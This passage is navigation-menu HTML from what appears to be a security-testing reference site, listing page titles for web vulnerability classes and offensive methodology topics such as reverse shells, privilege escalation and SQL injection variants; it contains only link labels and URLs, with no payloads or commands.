<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
Headless Browser
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
Headless Browser
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Headless%20Browser/" class="md-nav__link">
<span class="md-ellipsis">
Headless Browser
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_26" >
<label class="md-nav__link" for="__nav_26" id="__nav_26_label" tabindex="0">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_26_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_26">
<span class="md-nav__icon md-icon"></span>
Insecure Direct Object References
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Direct%20Object%20References/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_27" >
<label class="md-nav__link" for="__nav_27" id="__nav_27_label" tabindex="0">
<span class="md-ellipsis">
Insecure Management Interface
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_27_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_27">
<span class="md-nav__icon md-icon"></span>
Insecure Management Interface
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Management%20Interface/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Management Interface
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_28" >
<label class="md-nav__link" for="__nav_28" id="__nav_28_label" tabindex="0">
<span class="md-ellipsis">
Insecure Randomness
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_28_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_28">
<span class="md-nav__icon md-icon"></span>
Insecure Randomness
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Randomness/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Randomness
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_29" >
<label class="md-nav__link" for="__nav_29" id="__nav_29_label" tabindex="0">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_29_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_29">
<span class="md-nav__icon md-icon"></span>
Insecure Source Code Management
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Bazaar/" class="md-nav__link">
<span class="md-ellipsis">
Bazaar
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Git/" class="md-nav__link">
<span class="md-ellipsis">
Git
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Mercurial/" class="md-nav__link">
<span class="md-ellipsis">
Mercurial
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Subversion/" class="md-nav__link">
<span class="md-ellipsis">
Subversion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_30" >
<label class="md-nav__link" for="__nav_30" id="__nav_30_label" tabindex="0">
<span class="md-ellipsis">
JSON Web Token
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_30_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_30">
<span class="md-nav__icon md-icon"></span>
JSON Web Token
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../JSON%20Web%20Token/" class="md-nav__link">
<span class="md-ellipsis">
JWT - JSON Web Token
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_31" >
<label class="md-nav__link" for="__nav_31" id="__nav_31_label" tabindex="0">
<span class="md-ellipsis">
Java RMI
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_31_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_31">
<span class="md-nav__icon md-icon"></span>
Java RMI
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Java%20RMI/" class="md-nav__link">
<span class="md-ellipsis">
Java RMI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_32" >
<label class="md-nav__link" for="__nav_32" id="__nav_32_label" tabindex="0">
<span class="md-ellipsis">
LDAP Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_32_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_32">
<span class="md-nav__icon md-icon"></span>
LDAP Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LDAP%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LDAP Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_33" >
<label class="md-nav__link" for="__nav_33" id="__nav_33_label" tabindex="0">
<span class="md-ellipsis">
LaTeX Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_33_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_33">
<span class="md-nav__icon md-icon"></span>
LaTeX Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LaTeX%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LaTeX Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_34" >
<label class="md-nav__link" for="__nav_34" id="__nav_34_label" tabindex="0">
<span class="md-ellipsis">
Mass Assignment
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_34_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_34">
<span class="md-nav__icon md-icon"></span>
Mass Assignment
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Mass%20Assignment/" class="md-nav__link">
<span class="md-ellipsis">
Mass Assignment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_35" >
<label class="md-nav__link" for="__nav_35" id="__nav_35_label" tabindex="0">
<span class="md-ellipsis">
Methodology and Resources
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_35_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_35">
<span class="md-nav__icon md-icon"></span>
Methodology and Resources
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Active%20Directory%20Attack/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Docker%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Kubernetes%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Kubernetes
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Escape%20Breakout/" class="md-nav__link">
<span class="md-ellipsis">
Application Escape and Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/HTML%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Hash%20Cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Initial%20Access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Server
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Methodology%20and%20enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology and Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Pivoting%20Techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Office%20-%20Attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Powershell%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management &amp; CI/CD Compromise
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Vulnerability%20Reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Web%20Attack%20Surface/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20DPAPI/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Mimikatz/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Using%20credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_36" >
<label class="md-nav__link" for="__nav_36" id="__nav_36_label" tabindex="0">
<span class="md-ellipsis">
NoSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_36_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_36">
<span class="md-nav__icon md-icon"></span>
NoSQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../NoSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
NoSQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_37" >
<label class="md-nav__link" for="__nav_37" id="__nav_37_label" tabindex="0">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_37_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_37">
<span class="md-nav__icon md-icon"></span>
OAuth Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../OAuth%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_38" >
<label class="md-nav__link" for="__nav_38" id="__nav_38_label" tabindex="0">
<span class="md-ellipsis">
ORM Leak
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_38_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_38">
<span class="md-nav__icon md-icon"></span>
ORM Leak
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../ORM%20Leak/" class="md-nav__link">
<span class="md-ellipsis">
ORM Leak
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_39" >
<label class="md-nav__link" for="__nav_39" id="__nav_39_label" tabindex="0">
<span class="md-ellipsis">
Open Redirect
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_39_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_39">
<span class="md-nav__icon md-icon"></span>
Open Redirect
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Open%20Redirect/" class="md-nav__link">
<span class="md-ellipsis">
Open URL Redirect
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_40" >
<label class="md-nav__link" for="__nav_40" id="__nav_40_label" tabindex="0">
<span class="md-ellipsis">
Prompt Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_40_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_40">
<span class="md-nav__icon md-icon"></span>
Prompt Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prompt%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Prompt Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_41" >
<label class="md-nav__link" for="__nav_41" id="__nav_41_label" tabindex="0">
<span class="md-ellipsis">
Prototype Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_41_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_41">
<span class="md-nav__icon md-icon"></span>
Prototype Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prototype%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
Prototype Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_42" >
<label class="md-nav__link" for="__nav_42" id="__nav_42_label" tabindex="0">
<span class="md-ellipsis">
Race Condition
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_42_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_42">
<span class="md-nav__icon md-icon"></span>
Race Condition
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Race%20Condition/" class="md-nav__link">
<span class="md-ellipsis">
Race Condition
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_43" >
<label class="md-nav__link" for="__nav_43" id="__nav_43_label" tabindex="0">
<span class="md-ellipsis">
Regular Expression
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_43_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_43">
<span class="md-nav__icon md-icon"></span>
Regular Expression
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Regular%20Expression/" class="md-nav__link">
<span class="md-ellipsis">
Regular Expression
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_44" >
<label class="md-nav__link" for="__nav_44" id="__nav_44_label" tabindex="0">
<span class="md-ellipsis">
Request Smuggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_44">
<span class="md-nav__icon md-icon"></span>
Request Smuggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Request%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
Request Smuggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_45" >
<label class="md-nav__link" for="__nav_45" id="__nav_45_label" tabindex="0">
<span class="md-ellipsis">
SAML Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_45_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_45">
<span class="md-nav__icon md-icon"></span>
SAML Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SAML%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SAML Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_46" >
<label class="md-nav__link" for="__nav_46" id="__nav_46_label" tabindex="0">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_46_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_46">
<span class="md-nav__icon md-icon"></span>
SQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/BigQuery%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Google BigQuery SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/Cassandra%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cassandra Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/DB2%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
DB2 Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MSSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MySQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MySQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/OracleSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Oracle SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/PostgreSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
PostgreSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/SQLite%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQLite Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/SQLmap/" class="md-nav__link">
<span class="md-ellipsis">
SQLmap
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" >
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
Server Side Include Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
Server Side Include Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Include%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Include Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_48" >
<label class="md-nav__link" for="__nav_48" id="__nav_48_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_48_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_48">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Request%20Forgery/SSRF-Advanced-Exploitation/" class="md-nav__link">
<span class="md-ellipsis">
SSRF Advanced Exploitation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances/" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Cloud Instances
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_49" >
<label class="md-nav__link" for="__nav_49" id="__nav_49_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_49_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_49">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/ASP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - ASP.NET
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Java/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Java
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/JavaScript/" class="md-nav__link">
<span class="md-ellipsis">
